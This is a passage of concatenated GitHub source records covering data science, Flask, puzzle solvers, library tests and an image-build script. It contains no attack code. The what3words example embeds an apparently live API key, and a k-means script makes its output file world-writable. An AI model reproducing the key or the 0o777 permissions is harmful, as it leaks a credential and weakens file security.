new_tag)\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=\"Versioning utils\")\n    parser.add_argument(\"--release-type\", type=str, required=True, help=\"type of release = major/minor/patch\")\n    parser.add_argument(\n        \"--update-version\", action=\"store_true\", required=False, help=\"updates the version in fairscale/version.py\"\n    )\n\n    args = parser.parse_args()\n    main(args)\n","repo_name":"facebookresearch/fairscale","sub_path":"release_utils.py","file_name":"release_utils.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":2639,"dataset":"github-code","pt":"72"} +{"seq_id":"15368359174","text":"# Average connections for all PLDs within one simulation\n# Refer to notes for justification of approach\n\n\nimport os\nimport pandas as pd\nimport geopandas as gp\n\n# input\nshp_folder = r'C:\\Users\\jcristia\\Documents\\GIS\\MSc_Projects\\Hakai\\scripts_runs_cluster\\seagrass\\seagrass_20200327_SS201408\\shp_merged'\nfile = 'connectivity_pld{}.shp'\nplds = ['01', '03', '07', '21', '60']\nshp_out = 'connectivity_average.shp'\n\n# read in shapefiles within folder as a geopandas dataframe (gdf) and append to overall gdf\ngdf_all = gp.GeoDataFrame()\nfor p in plds:\n    gdf = gp.read_file(os.path.join(shp_folder, file.format(p)))\n    gdf['pld'] = int(p)\n    gdf_all = gdf_all.append(gdf)\ngdf_all = gdf_all.astype({'from_id':int, 'to_id':int}) # there's still a mix of datatypes in the columns for some reason. This was super important to do or else the code below didn't recognize duplicates.
\n\n# groupby\n# on aggregation, use a custom function\ndef mean_cust_denom(x):\n    s = x.sum()\n    m = s/float(len(plds))\n    return m\ngdf_group = gdf_all.groupby(['from_id', 'to_id']).agg(\n    prob_avg = ('prob', mean_cust_denom),\n    #time_int = ('time_int', 'first'), # I'm taking this out to avoid confusion since it was calculated incorrectly in the biology script.\n    totalori = ('totalori', 'first'),\n    date_start = ('date_start', 'first'),\n    geometry = ('geometry', 'first'),\n    pld = ('pld', 'min') # take the minimum PLD\n    )\ngdf_group = gdf_group.astype({'totalori':int})\ngdf_group = gdf_group.reset_index()\n\n# output\ngdf_f = gp.GeoDataFrame(gdf_group, crs=gdf.crs)\ngdf_f.to_file(filename=os.path.join(shp_folder, shp_out), driver='ESRI Shapefile')","repo_name":"jcristia/connectivity_hakai","sub_path":"scripts_dev_scratch/network_analysis/02_average_connectivity.py","file_name":"02_average_connectivity.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12598775705","text":"\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nimport seaborn as sns; sns.set()\nimport csv\nimport sys\nimport os\n\n\narch_inicial= sys.argv[1]\narch_final= sys.argv[2]\narch_final_centroide= sys.argv[4]\ncluster=sys.argv[3]\n\n#print ('C:/laragon/www/siams/storage/kmeans/' + arch_inicial)\ndf = pd.read_csv(arch_inicial)\n\ndf.dropna(axis=0,how='any',subset=['latitud','longitud'],inplace=True)\nX=df.loc[:,['id','latitud','longitud']]\n\nkmeans = KMeans(n_clusters = int(cluster), init ='k-means++')\nkmeans.fit(X[X.columns[1:3]]) # Compute k-means clustering.\nX['cluster_label'] = kmeans.fit_predict(X[X.columns[1:3]])\ncenters = kmeans.cluster_centers_ # Coordinates of cluster centers.\nlabels = kmeans.predict(X[X.columns[1:3]]) # Labels of each point\n\nX.plot.scatter(x = 'latitud', y = 'longitud', c=labels, s=50, cmap='viridis')\nplt.scatter(centers[:, 0], centers[:, 1], c='black', s=200, alpha=0.5)\nprint(\"before\")\ndf = pd.DataFrame(X)\ndf.to_csv(arch_final)\n\nY= kmeans.cluster_centers_\ndf = pd.DataFrame(Y)\ndf.to_csv(arch_final_centroide)\n\nprint(\"middle\")\nstrFile = \"/var/www/siams/public/img/kmeans/poo.png\"\nif os.path.isfile(strFile):\n    os.remove(strFile)  # Opt.: os.system(\"rm \"+strFile)\nplt.savefig('/var/www/siams/public/img/kmeans/poo.png')\nos.chmod(\"/var/www/siams/public/img/kmeans/poo.png\", 0o777)  # decimal 777 was wrong; file modes must be the octal literal 0o777\nprint (\"final\")","repo_name":"XavierJuradoM/SIAMS","sub_path":"storage/kmeans/algoritmo.py","file_name":"algoritmo.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"26040702925","text":"from flask import Flask, request, render_template\r\n\r\n# from flask_debugtoolbar import DebugToolbarExtension\r\n\r\napp = Flask(__name__)\r\n# app.config[\"SECRET_KEY\"] = \"somethingRandom\"\r\n\r\n# debug = DebugToolbarExtension(app)\r\n\r\n\r\n@app.route(\"/\")\r\ndef index():\r\n    \"\"\"Return homepage.\"\"\"\r\n    return render_template(\"base.html\")\r\n\r\n\r\n@app.route(\"/story\")\r\ndef get_story():\r\n    place = request.args[\"place\"]\r\n    noun = request.args[\"noun\"]\r\n    verb = request.args[\"verb\"]\r\n    adjective = request.args[\"adjective\"]\r\n    plural_noun = request.args[\"plural_noun\"]\r\n    return render_template(\r\n        \"story.html\",\r\n        place=place,\r\n
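        # forward each captured word into the story template\r\n        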
noun=noun,\r\n verb=verb,\r\n adjective=adjective,\r\n plural_noun=plural_noun,\r\n )\r\n","repo_name":"CyberMermaid/Jinja-Exercise","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"398848299","text":"points = [(6,10), (0,14), (9,10), (0,3), (10,4), (4,11), (6,0), (6,12), (4,1), (0,13), (10,12), (3,4), (3,0), (8,4), (1,10), (2,14), (8,10), (9,0),]\nfolds = [(1,7), (0,5),]\n\nfor j,(d,f) in enumerate(folds):\n\tfor i,p in enumerate(points):\n\t\tif p[d] > f:\n\t\t\tp = list(p)\n\t\t\tp[d] = f - (p[d] - f)\n\t\t\tpoints[i] = tuple(p)\n\tif j == 0:\n\t\tprint(len(set(points)))\n\npoints = set(points)\nxmin = min(p[0] for p in points)\nxmax = max(p[0] for p in points)\nymin = min(p[1] for p in points)\nymax = max(p[1] for p in points)\nfor y in range(ymin,ymax+1):\n\tfor x in range(xmin,xmax+1):\n\t\tif (x,y) in points:\n\t\t\tprint('#',end='')\n\t\telse:\n\t\t\tprint(' ',end='')\n\tprint()\n","repo_name":"mrphlip/aoc","sub_path":"2021/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"9441657115","text":"# Import libraries\r\nimport time\r\nfrom datetime import datetime\r\nfrom urllib.request import urlopen as uReq\r\nfrom bs4 import BeautifulSoup as soup\r\n\r\n#Makes loop infinite\r\nwhile True:\r\n\r\n # Set the URL you want to webscrape from\r\n url = 'https://pomber.github.io/covid19/timeseries.json'\r\n \r\n # Connect to the URL\r\n uClient = uReq(url)\r\n page_html = uClient.read()\r\n uClient.close()\r\n \r\n #set html parsing\r\n page_soup = soup(page_html,\"html.parser\")\r\n \r\n #opens .txt file for temp data storage\r\n file = open(\"datastorage.txt\",\"w\")\r\n \r\n #clears contents of file\r\n file.truncate()\r\n \r\n #writes data to .txt file\r\n file.write(str(page_soup))\r\n\r\n #closes file\r\n file.close()\r\n\r\n #for debugging\r\n now = datetime.now()\r\n print(\"File read at:\",now)\r\n \r\n #delays data capture by 1 hour\r\n time.sleep(3600)\r\n \r\n","repo_name":"n1khil69/corona","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71830752233","text":"import what3words\nfrom os import environ\n\ngeocoder = what3words.Geocoder(\"339SOHLH\") \n# what3words-api-key\n\nautosuggest = geocoder.autosuggest('brilliant.convince.catch', \\\n clip_to_country=\"UG\", \\\n focus=what3words.Coordinates(-0.617737, 30.656135), \\\n n_results=1, \\\n)\n# 48.856618, 2.3522411 ... 
focus\nif 'error' in autosuggest: # An error has been returned from the API\n code = autosuggest['error']['code']\n message = autosuggest['error']['message']\n\n print (code, message)\nelse:\n # Obtains the one, and only result from the returned list of suggestions\n words = autosuggest['suggestions'][0]['words']\n print(\"Top 3 word address match: {}\".format(words))\n\n # Use the `convert_to_coordinates` API to convert the returned 3 word address into coordinates\n convert_to_coordinates = geocoder.convert_to_coordinates(words)\n\n print(\"WGS84 Coordinates: {}, {}\".format( \\\n convert_to_coordinates['coordinates']['lat'], \\\n convert_to_coordinates['coordinates']['lng']))\n print(\"Nearest Place: {}\".format(convert_to_coordinates['nearestPlace']))","repo_name":"HerbertInk/degreesMinSec","sub_path":"justthe#/degreesMinSec/threeWords.py","file_name":"threeWords.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16235297939","text":"import json\nimport os\nimport tempfile\nfrom unittest.mock import patch\n\nimport torch\nfrom torch.utils.data import DataLoader, TensorDataset\n\nfrom accelerate.accelerator import Accelerator\nfrom accelerate.state import PartialState\nfrom accelerate.test_utils.testing import AccelerateTestCase, require_cuda\nfrom accelerate.utils import patch_environment\n\n\ndef create_components():\n model = torch.nn.Linear(2, 4)\n optimizer = torch.optim.AdamW(model.parameters(), lr=1.0)\n scheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer, max_lr=0.01, steps_per_epoch=2, epochs=1)\n train_dl = DataLoader(TensorDataset(torch.tensor([1, 2, 3])))\n valid_dl = DataLoader(TensorDataset(torch.tensor([4, 5, 6])))\n\n return model, optimizer, scheduler, train_dl, valid_dl\n\n\ndef get_signature(model):\n return (model.weight.abs().sum() + model.bias.abs().sum()).item()\n\n\ndef load_random_weights(model):\n state = torch.nn.Linear(*tuple(model.weight.T.shape)).state_dict()\n model.load_state_dict(state)\n\n\nclass AcceleratorTester(AccelerateTestCase):\n @require_cuda\n def test_accelerator_can_be_reinstantiated(self):\n _ = Accelerator()\n assert PartialState._shared_state[\"_cpu\"] is False\n assert PartialState._shared_state[\"device\"].type == \"cuda\"\n with self.assertRaises(AssertionError):\n _ = Accelerator(cpu=True)\n\n def test_prepared_objects_are_referenced(self):\n accelerator = Accelerator()\n model, optimizer, scheduler, train_dl, valid_dl = create_components()\n\n (\n prepared_model,\n prepared_optimizer,\n prepared_scheduler,\n prepared_train_dl,\n prepared_valid_dl,\n ) = accelerator.prepare(model, optimizer, scheduler, train_dl, valid_dl)\n\n self.assertTrue(prepared_model in accelerator._models)\n self.assertTrue(prepared_optimizer in accelerator._optimizers)\n self.assertTrue(prepared_scheduler in accelerator._schedulers)\n self.assertTrue(prepared_train_dl in accelerator._dataloaders)\n self.assertTrue(prepared_valid_dl in accelerator._dataloaders)\n\n def test_free_memory_dereferences_prepared_components(self):\n accelerator = Accelerator()\n model, optimizer, scheduler, train_dl, valid_dl = create_components()\n accelerator.prepare(model, optimizer, scheduler, train_dl, valid_dl)\n accelerator.free_memory()\n\n self.assertTrue(len(accelerator._models) == 0)\n self.assertTrue(len(accelerator._optimizers) == 0)\n self.assertTrue(len(accelerator._schedulers) == 0)\n self.assertTrue(len(accelerator._dataloaders) == 0)\n\n def 
test_env_var_device(self):\n \"\"\"Tests that setting the torch device with ACCELERATE_TORCH_DEVICE overrides default device.\"\"\"\n PartialState._reset_state()\n\n # Mock torch.cuda.set_device to avoid an exception as the device doesn't exist\n def noop(*args, **kwargs):\n pass\n\n with patch(\"torch.cuda.set_device\", noop), patch_environment(ACCELERATE_TORCH_DEVICE=\"cuda:64\"):\n accelerator = Accelerator()\n self.assertEqual(str(accelerator.state.device), \"cuda:64\")\n\n def test_save_load_model(self):\n accelerator = Accelerator()\n model, optimizer, scheduler, train_dl, valid_dl = create_components()\n accelerator.prepare(model, optimizer, scheduler, train_dl, valid_dl)\n\n model_signature = get_signature(model)\n\n with tempfile.TemporaryDirectory() as tmpdirname:\n accelerator.save_state(tmpdirname)\n\n # make sure random weights don't match\n load_random_weights(model)\n self.assertTrue(abs(model_signature - get_signature(model)) > 1e-3)\n\n # make sure loaded weights match\n accelerator.load_state(tmpdirname)\n self.assertTrue(abs(model_signature - get_signature(model)) < 1e-3)\n\n def test_save_load_model_with_hooks(self):\n accelerator = Accelerator()\n model, optimizer, scheduler, train_dl, valid_dl = create_components()\n accelerator.prepare(model, optimizer, scheduler, train_dl, valid_dl)\n\n model_signature = get_signature(model)\n\n # saving hook\n def save_config(models, weights, output_dir):\n config = {\"class_name\": models[0].__class__.__name__}\n\n with open(os.path.join(output_dir, \"data.json\"), \"w\") as f:\n json.dump(config, f)\n\n # loading hook\n def load_config(models, input_dir):\n with open(os.path.join(input_dir, \"data.json\"), \"r\") as f:\n config = json.load(f)\n\n models[0].class_name = config[\"class_name\"]\n\n save_hook = accelerator.register_save_state_pre_hook(save_config)\n load_hook = accelerator.register_load_state_pre_hook(load_config)\n\n with tempfile.TemporaryDirectory() as tmpdirname:\n accelerator.save_state(tmpdirname)\n\n # make sure random weights don't match with hooks\n load_random_weights(model)\n self.assertTrue(abs(model_signature - get_signature(model)) > 1e-3)\n\n # random class name to verify correct one is loaded\n model.class_name = \"random\"\n\n # make sure loaded weights match with hooks\n accelerator.load_state(tmpdirname)\n self.assertTrue(abs(model_signature - get_signature(model)) < 1e-3)\n\n # mode.class_name is loaded from config\n self.assertTrue(model.class_name == model.__class__.__name__)\n\n # remove hooks\n save_hook.remove()\n load_hook.remove()\n\n with tempfile.TemporaryDirectory() as tmpdirname:\n accelerator.save_state(tmpdirname)\n\n # make sure random weights don't match with hooks removed\n load_random_weights(model)\n self.assertTrue(abs(model_signature - get_signature(model)) > 1e-3)\n\n # random class name to verify correct one is loaded\n model.class_name = \"random\"\n\n # make sure loaded weights match with hooks removed\n accelerator.load_state(tmpdirname)\n self.assertTrue(abs(model_signature - get_signature(model)) < 1e-3)\n\n # mode.class_name is NOT loaded from config\n self.assertTrue(model.class_name != model.__class__.__name__)\n","repo_name":"meanna/dreambooth","sub_path":"accelerate/tests/test_accelerator.py","file_name":"test_accelerator.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9805705668","text":"from olimage.core.io import Console\nfrom olimage.core.setup import 
Setup\nfrom olimage.core.utils import Utils\n\nfrom olimage.filesystem.decorators import export, prepare, stamp\nfrom olimage.filesystem.base import FileSystemBase\n\n\nclass VariantBase(FileSystemBase):\n stages = ['configure', 'cleanup']\n variant = 'base'\n\n @stamp\n @export\n @prepare\n def configure(self):\n\n # Copy resolv.conf\n with Console(\"Copying /etc/resolv.conf\"):\n Utils.shell.run('rm -vf {}/etc/resolv.conf'.format(self._build_dir), ignore_fail=True)\n Utils.shell.run('cp -vf /etc/resolv.conf {}/etc/resolv.conf'.format(self._build_dir))\n\n # Install packages\n self._install_packages()\n\n # Configure blueman\n with Console(\"Configuring blueman\"):\n Setup.blueman()\n\n # Enabling auto-login\n with Console(\"Enabling auto-login\"):\n Utils.install('/etc/lightdm/lightdm.conf')\n\n # Set default displaymanager\n with Console(\"Setting default display-manager\"):\n Setup.displaymanager(\"lightdm\")\n\n # post-install\n with Console(\"Post-install tasks\"):\n Utils.shell.chroot(\"/bin/bash -c 'echo -en > /etc/modules-load.d/cups-filters.conf'\", ignore_fail=True)\n\n # meh broken light-locker in focal\n Utils.shell.chroot('apt-get -y --purge remove light-locker', log_error=False)\n\n # xfce panel defaults\n Utils.install('/etc/X11/Xsession.d/99olimex')\n\n # set xfce background\n Utils.shell.run('dpkg-divert --rename --add --divert /usr/share/backgrounds/xfce/xfce-stripes.png.real /usr/share/backgrounds/xfce/xfce-stripes.png')\n Utils.shell.run('dpkg-divert --rename --add --divert /usr/share/backgrounds/xfce/xfce-blue.jpg.real /usr/share/backgrounds/xfce/xfce-blue.jpg')\n Utils.install('/usr/share/backgrounds/xfce/xfce-stripes.png')\n Utils.install('/usr/share/backgrounds/xfce/xfce-blue.jpg')\n Utils.install('/usr/share/backgrounds/xfce/xfce-red.jpg')\n\n # restore resolv.conf\n with Console(\"Restore /etc/resolv.conf\"):\n Utils.shell.run('rm -vf {}/etc/resolv.conf'.format(self._build_dir), ignore_fail=True)\n Utils.shell.run('ln -nsf ../run/resolvconf/resolv.conf {}/etc/resolv.conf'.format(self._build_dir))\n\n @stamp\n @export(final=True)\n @prepare\n def cleanup(self):\n super().cleanup()\n\n","repo_name":"OLIMEX/olimage","sub_path":"olimage/filesystem/variants/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"10781156154","text":"\"\"\"\nApproach 1: Brute Force -: Try it on Every Node\n TC: O(N^2)\n SC: O(N)\n\nApproach 2: Top Down --> Update the globalValue and return the localValue\n TC: O(N)\n SC: O(N)\n\nApproach 3: Bottom Up Approach -: therefore, will need a special return type i.e, PathDetails\n TC: O(N)\n SC: O(N)\n\n\"\"\"\nimport math\nfrom dataclasses import dataclass\nfrom typing import Any\n\n\n@dataclass\nclass TreeNode:\n val: int = None\n left: Any = None\n right: Any = None\n\nclass SolutionBruteForce:\n MIN = -math.inf\n maxPath = -math.inf\n\n def _maxPathSum(self, node: TreeNode) -> int:\n # Base Case\n if node is None:\n return 0\n return node.val + max(self._maxPathSum(node.left), self._maxPathSum(node.right))\n\n def getMaxPath(self, root: TreeNode) -> int:\n # Base Case\n if root is None:\n return 0\n\n # Find the details at this node\n LV = self._maxPathSum(root.left)\n RV = self._maxPathSum(root.right)\n\n CV = LV + RV + root.val\n\n # Explore\n LMS = self.getMaxPath(root.left)\n RMS = self.getMaxPath(root.right)\n\n return max(CV, LMS, RMS)\n\n def getMaxPathTopDown(self, root: TreeNode) -> int: # TC: O(N)\n # 
Base Case\n        if root is None:\n            return 0\n\n        leftSum = max(self.getMaxPathTopDown(root.left), 0)\n        rightSum = max(self.getMaxPathTopDown(root.right), 0)\n\n        maxAtNode = root.val + leftSum + rightSum\n        self.maxPath = max(self.maxPath, maxAtNode)\n\n        return max(leftSum, rightSum) + root.val\n\n\n@dataclass\nclass PathDetails:\n    msp: int = -math.inf  # Max Sum Path\n    rmp: int = -math.inf  # Root Max Path\n\n\nclass Solution:\n    def getMaxPath(self, root: TreeNode) -> PathDetails:\n        rt = PathDetails()\n        # Base Case\n        if root is None:\n            return rt\n\n        # Explore\n        LV = self.getMaxPath(root.left)\n        RV = self.getMaxPath(root.right)\n\n        if root.left is None:\n            CV = root.val + RV.rmp\n        elif root.right is None:\n            CV = root.val + LV.rmp\n        elif LV.rmp > 0 and RV.rmp > 0:\n            CV = LV.rmp + RV.rmp + root.val\n        else:\n            CV = root.val + max(LV.rmp, RV.rmp)\n\n        rt.msp = max(LV.msp, RV.msp, CV)\n        rt.rmp = max(LV.rmp, RV.rmp) + root.val if max(LV.rmp, RV.rmp) > 0 else root.val\n\n        return rt\n","repo_name":"sandeepyadav10011995/Data-Structures","sub_path":"IT Bodhi/Binary Tree/DFS/13. Max Path For Any Two Nodes.py","file_name":"13. Max Path For Any Two Nodes.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69959509353","text":"import sys\r\ninput = sys.stdin.readline\r\nR, C, T = map(int, input().split()) # rows # cols\r\nA = [list(map(int, input().split())) for _ in range(R)]\r\n\r\ndx = [0,1,0,-1]\r\ndy = [1,0,-1,0]\r\n\r\nfor t in range(T): # repeat once per second\r\n\r\n    # fine dust spreads\r\n    dust = []\r\n    for r in range(R): # collect every cell that contains dust\r\n        for c in range(C):\r\n            if A[r][c] > 0:\r\n                dust.append([r, c])\r\n\r\n    # only cells containing dust spread\r\n    for d in dust:\r\n        spread = 0\r\n        x = d[0]\r\n        y = d[1]\r\n        for i in range(4): # spread to the four adjacent directions\r\n            nx = x + dx[i]\r\n            ny = y + dy[i]\r\n            if 0 <= nx < R and 0 <= ny < C: # the cell exists\r\n                if A[nx][ny] != -1: # and is not the air purifier\r\n                    d.append([nx,ny]) # record spread target\r\n                    d.append(A[x][y] // 5) # and spread amount\r\n                    spread += 1\r\n        d.append(spread)\r\n        A[x][y] -= (A[x][y] // 5) * spread # Ar,c - (Ar,c/5)×(number of directions spread to)\r\n\r\n    # print(dust) # dust[0] = [0, 7, [1, 7], 1, [0, 6], 1, 2]\r\n    for d in dust:\r\n        for n in range(d[-1]):\r\n            xx = d[(n + 1) * 2][0]\r\n            yy = d[(n + 1) * 2][1]\r\n            A[xx][yy] += d[((n + 1) * 2) + 1]\r\n    # pprint(A) # spreading complete\r\n\r\n    # run the air purifier\r\n    # purifier cells: A[2:R-1][0] == -1\r\n    clean = []\r\n    for a in range(2, R-1):\r\n        if A[a][0] == -1:\r\n            clean.append(a)\r\n\r\n    # upper part circulates counterclockwise\r\n    up01 = A[clean[0]][1:C-1]\r\n    up01.insert(0,0) # [0, 2, 1, 1, 0, 4, 6]\r\n\r\n    up02 = [] # [6, 5]\r\n    for u in range(1, clean[0]+1):\r\n        up02.append(A[u][-1])\r\n\r\n    up03 = A[0][1:C] # [0, 0, 0, 0, 0, 1, 8]\r\n\r\n    up04 = [] # [0]\r\n    for u in range(clean[0]-1):\r\n        up04.append(A[u][0])\r\n\r\n    A[clean[0]][1:C] = up01 # A[2][1:8]\r\n\r\n    for u in range(clean[0]): # A[0:clean[0]]\r\n        A[u][-1] = up02[u]\r\n\r\n    A[0][0:C-1] = up03 # A[0][0:7]\r\n\r\n    for u in range(clean[0]-1): # A[1:clean[0]]\r\n        A[u+1][0] = up04[u]\r\n\r\n\r\n    # lower part circulates clockwise\r\n    down01 = A[clean[1]][1:C-1]\r\n    down01.insert(0,0) # [0, 5, 2, 0, 0, 2, 12]\r\n\r\n    down02 = [] # [0, 8, 0]\r\n    for u in range(clean[1], R-1):\r\n        down02.append(A[u][-1])\r\n\r\n    down03 = A[-1][1:C] # [8, 17, 8, 3, 4, 8, 4]\r\n\r\n    down04 = [] # [0, 0]\r\n    for u in range(clean[1]+2, R):\r\n        down04.append(A[u][0])\r\n\r\n    A[clean[1]][1:C] = down01 # A[3][1:8]\r\n\r\n    for u in range(clean[1]+1, R): # A[4:7][-1]\r\n        A[u][-1] = down02[u-(clean[1]+1)]\r\n\r\n    A[-1][0:C-1] = down03 # A[-1][0:7]\r\n
\r\n    for u in range(clean[1]+1, R-1): # A[4:6][0]\r\n        A[u][0] = down04[u-(clean[1]+1)]\r\n\r\nsum = 0\r\nfor du in range(R):\r\n    for st in range(C):\r\n        if A[du][st] > 0:\r\n            sum += A[du][st]\r\n\r\nprint(sum) # total fine dust remaining after the last second\r\n","repo_name":"kanghaeven/Algorithm","sub_path":"백준/Gold/17144. 미세먼지 안녕!/미세먼지 안녕!.py","file_name":"미세먼지 안녕!.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30756463822","text":"from calendar import Calendar\nfrom datetime import date\nimport calendar\n\n# subclassing the built-in ValueError to create MeetupDayException\nclass MeetupDayException(ValueError):\n    \"\"\"Exception raised when the Meetup weekday and count do not result in a valid date.\n\n    message: explanation of the error.\n\n    \"\"\"\n    def __init__(self, message):\n        self.message = message\n\n\ndef meetup(year, month, week, day_of_week):\n    \"\"\"\n    Description: Function for returning the first, second, third, fourth, last & teenth day\n    of the month.\n    \"\"\"\n\n    descriptor_map = {\n        \"first\": 0,\n        \"second\": 1,\n        \"third\": 2,\n        \"fourth\": 3,\n        \"fifth\": 4,\n        \"last\": -1,\n        \"teenth\": None\n    }\n\n    _days = {\n        \"Monday\": 0,\n        \"Tuesday\": 1,\n        \"Wednesday\": 2,\n        \"Thursday\": 3,\n        \"Friday\": 4,\n        \"Saturday\": 5,\n        \"Sunday\": 6\n    }\n\n    if week not in list(descriptor_map.keys()):\n        raise MeetupDayException(\"That day does not exist.\")\n\n    cal = Calendar()\n\n    w = [d for d in cal.monthdays2calendar(year, month)]\n    list_of_days = [day for _week in w for day in _week if day[0]>0 and day[1] == _days[day_of_week]]\n\n    if week == \"teenth\":\n        for i in list_of_days:\n            if i[0]>12 and i[0] <= 19:\n                return date(year, month, i[0])\n    else:\n        try:\n            val = list_of_days[descriptor_map[week]]\n        except IndexError:\n            raise MeetupDayException(\"That day does not exist.\")\n\n        return date(year, month, val[0])","repo_name":"TheLinuxEnthusiast/exercism-df","sub_path":"python/meetup/meetup.py","file_name":"meetup.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70738565352","text":"class Solution(object):\n    def isValidSudoku(self, board):\n        \"\"\"\n        :type board: List[List[str]]\n        :rtype: bool\n        \"\"\"\n\n        for x in range(0, 9): # rows\n            num_set1 = set()\n            num_set2 = set()\n            count_nums1 = 0\n            count_nums2 = 0\n            for y in range(0, 9):\n\n                if self.isConvertibleToInt(board[x][y]):\n                    count_nums1 += 1\n                    num_set1.add(board[x][y])\n                    if len(num_set1) != count_nums1:\n                        return False\n\n                if self.isConvertibleToInt(board[y][x]):\n                    count_nums2 += 1\n                    num_set2.add(board[y][x])\n                    if len(num_set2) != count_nums2:\n                        return False\n\n        for i in range(0, 9, 3):\n            for j in range(0, 9, 3):\n                num_set = set()\n                count_nums = 0\n                for x in range(i, i + 3):\n                    for y in range(j, j + 3):\n                        if self.isConvertibleToInt(board[x][y]):\n                            count_nums += 1\n                            num_set.add(board[x][y])\n                            if len(num_set) != count_nums:\n                                return False\n        return True\n\n    def isConvertibleToInt(self, s):\n        try:\n            int(s)\n            return True\n        except ValueError:\n            return False\n","repo_name":"AbduAwad/LeetCodeProblemSolutions","sub_path":"0036-valid-sudoku/0036-valid-sudoku.py","file_name":"0036-valid-sudoku.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23253986760","text":"import numpy as np\nfrom collections import deque
\nimport json\nimport itertools\nimport random\n\n\ndef getReachablePoints(pos,size) :\n\tx,y = size\n\tif pos[0] == 0 :\n\t\tif pos[1] == 0 :\n\t\t\treturn [1,1*x+0]\n\t\telif pos[1] == y-1 :\n\t\t\treturn [pos[1]-1,1*x+pos[1]]\n\t\telse :\n\t\t\treturn [pos[1]-1,pos[1]+1,1*x+pos[1]]\n\telif pos[1] == y-1 :\n\t\tif pos[0] == x-1 :\n\t\t\treturn [pos[0]*x+y-2,(pos[0]-1)*x+y-1]\n\t\telse :\n\t\t\treturn [pos[0]*x+y-2,(pos[0]-1)*x+y-1,(pos[0]+1)*x+y-1]\n\telif pos[0] == x-1 :\n\t\tif pos[1] == 0 :\n\t\t\treturn [(pos[0]-1)*x+pos[1],pos[0]*x+(pos[1]+1)]\n\t\telse :\n\t\t\treturn [(pos[0]-1)*x+pos[1],pos[0]*x+(pos[1]+1),pos[0]*x+(pos[1]-1)]\n\telif pos[1] == 0 :\n\t\treturn [pos[0]*x+1,(pos[0]-1)*x,(pos[0]+1)*x]\n\telse :\n\t\treturn [(pos[0]-1)*x+pos[1],(pos[0]+1)*x+pos[1],pos[0]*x+pos[1]-1,pos[0]*x+pos[1]+1]\n\ndef addNodes(pos,size,flags,q,game_map) :\n\tnodes = getReachablePoints(pos,size)\n\tfor node in nodes :\n\t\tif flags[node] == 0 and game_map[node/size[0],node%size[0]] == 0:\n\t\t\tflags[node] = 1\n\t\t\tq.append(node)\n\t\tif game_map[node/size[0],node%size[0]] == 2 :\n\t\t\tflags[node] = 1\n\treturn q,flags\n\ndef convertOneHot(idx,l) :\n\tarr = np.zeros([l])\n\tarr[idx] = 1\n\treturn arr\n\ndef checkVocab(s, vocabulary):\n\tfl = 0\n\tfor i in s.split(\" \"):\n\t\tif i not in vocabulary:\n\t\t\tfl = 1\n\treturn fl\n\n# Case 4: Go to [type]\n\ndef genObjectSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, active_rewards):\n\tids1 = []\n\tfor item in reward_dict :\n\t\tids1.append(item[0])\n\n\tids1 = np.array(ids1)\n\n\tfor item in data[\"objects\"]:\n\n\t\tide = item[\"id\"]\n\t\tif not ide in active_rewards:\n\t\t\tcontinue\n\n\t\treq_ind = np.where(ids1 == ide)\n\t\treq_ind = req_ind[0][0]\n\n\t\tloc = reward_dict[req_ind][1]\n\t\tsz = data[\"environment\"][\"Sizes\"][item[\"size\"]]\n\n\t\tif reachable[loc] == 1.0:\n\t\t\ts = \"Go to \" + item[\"type\"]\n\t\t\tfl = checkVocab(s, vocabulary)\n\n\t\t\tif fl == 0:\n\t\t\t\tif s in possible_sentences:\n\t\t\t\t\tind = possible_sentences.index(s)\n\t\t\t\t\tpos_size[ind].append((loc, sz))\n\t\t\t\telse:\n\t\t\t\t\tpossible_sentences.append(s)\n\t\t\t\t\tpos_size.append([(loc, sz)])\n\n\n\treturn possible_sentences, pos_size\n\n# Case 7: Go to [direction] of [size] [color] [type]\ndef genLocSentences(reachable, reward_dict, data, possible_sentences, pos_size, vocabulary, ids, active_rewards):\n\tids1 = []\n\tfor item in reward_dict :\n\t\tids1.append(item[0])\n\tids1 = np.array(ids1)\n\n\trows, cols = reachable.shape\n\tfor item in data[\"objects\"]:\n\n\t\tif item[\"size\"] != \"small\":\n\t\t\tcontinue\n\n\t\tide = item[\"id\"]\n\n\t\tif not ide in active_rewards:\n\t\t\tcontinue\n\n\t\treq_ind = np.where(ids1 == ide)\n\t\treq_ind = req_ind[0][0]\n\n\t\trx, ry 